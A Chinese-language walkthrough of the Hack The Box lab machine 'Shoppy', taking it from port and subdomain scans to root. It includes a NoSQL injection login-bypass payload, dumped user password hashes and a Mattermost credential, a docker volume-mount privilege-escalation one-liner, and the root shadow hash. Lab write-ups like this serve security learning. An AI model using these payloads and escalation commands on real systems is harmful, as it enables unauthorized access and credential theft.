基本信息
data:image/s3,"s3://crabby-images/74685/746857f1f6cc2e2e4e70c86a7b49838b6a24080a" alt=""
端口扫描
22,80:
1 | nmap -sC -sV -Pn 10.10.11.180 |
80
需要加hosts
1 | 10.10.11.180 shoppy.htb |
Wait page,还没正式开放:
data:image/s3,"s3://crabby-images/c168d/c168df59a426438c130cc33f29c808299794077f" alt=""
子域名扫描
子域名可以发现mattermost,这里对字典稍微有点要求:
1 | gobuster vhost -u http://shoppy.htb -w ~/Tools/dict/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt |
data:image/s3,"s3://crabby-images/85629/8562907d0dd9d7e5bc7aaf6fc9c482d29590e045" alt=""
目录扫描
简单的扫描或者常规手工枚举可以发现login:
data:image/s3,"s3://crabby-images/aab84/aab84d5ec25a92b54bc206be480d433638056255" alt=""
NoSQL注入
登录那里存在注入,但不是普通sql注入,而是NoSQL注入:
- NoSQL injection - HackTricks
https://book.hacktricks.xyz/pentesting-web/nosql-injection
1 | admin'||''==' |
data:image/s3,"s3://crabby-images/82335/823351eb9f1561496d9cdcf3891f5c637e856b94" alt=""
data:image/s3,"s3://crabby-images/a245c/a245cdc5a8642fb9de2272b6a25ecf4daa87be73" alt=""
search功能使用同样的payload搜索,结果中得到密码hash,可以解出来josh的密码:
data:image/s3,"s3://crabby-images/d8222/d822253afbe2f350853abf43c162b69c41410cd2" alt=""
1 | [{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}] |
mattermost
得到的josh账号密码可以登录mattermost,在其中一个频道中得到jaeger账号密码:
1 | username: jaeger |
data:image/s3,"s3://crabby-images/0017b/0017b640adcf83eedc48449dee5289efeefb7d77" alt=""
user flag
得到的jaeger用户ssh登录:
data:image/s3,"s3://crabby-images/78706/78706ba667ba0c96203dc7072ad9a7d40a9ee030" alt=""
提权信息
上面信息可以看到是需要先到deploy用户,这个程序strings没什么有用信息,但直接cat再结合尝试运行的报错信息,能够得到密码,没错,密码就是Sample
:
data:image/s3,"s3://crabby-images/a1d18/a1d1821e23911433e948dbfbf39d3f25aca85c6e" alt=""
deploy
使用密码运行程序,得到deploy的密码:
data:image/s3,"s3://crabby-images/707fd/707fde04fc3e96de595af4008ab2f66bf9064e78" alt=""
切换到deploy用户,发现当前用户在docker组中,那就是常规的docker挂载提权:
data:image/s3,"s3://crabby-images/dd197/dd1978e247b4384211245af37d9fcc8f5faf2aa2" alt=""
提权 & root flag
- docker | GTFOBins
https://gtfobins.github.io/gtfobins/docker/
1 | docker run -v /:/mnt --rm -it alpine chroot /mnt sh |
data:image/s3,"s3://crabby-images/09414/0941407cda162eedd73e1158f38a671a8bc326a8" alt=""
shadow
1 | root:$y$j9T$0gd6YLeK1QF8eXOhAGmb2.$rvSHnH5qysjj79l0OiXizdnFwT1vsQzz5U4p/vrHQMB:19195:0:99999:7::: |
参考资料
- NoSQL injection - HackTricks
https://book.hacktricks.xyz/pentesting-web/nosql-injection - docker | GTFOBins
https://gtfobins.github.io/gtfobins/docker/ - Shoppy - HTB [Discussion] | BreachForums
https://breached.to/Thread-Shoppy-HTB-Discussion - HackTheBox (HTB) Writeup: Shoppy [Easy] – meowmeowattack
https://meowmeowattack.wordpress.com/2022/09/21/hackthebox-htb-writeup-shoppy-easy/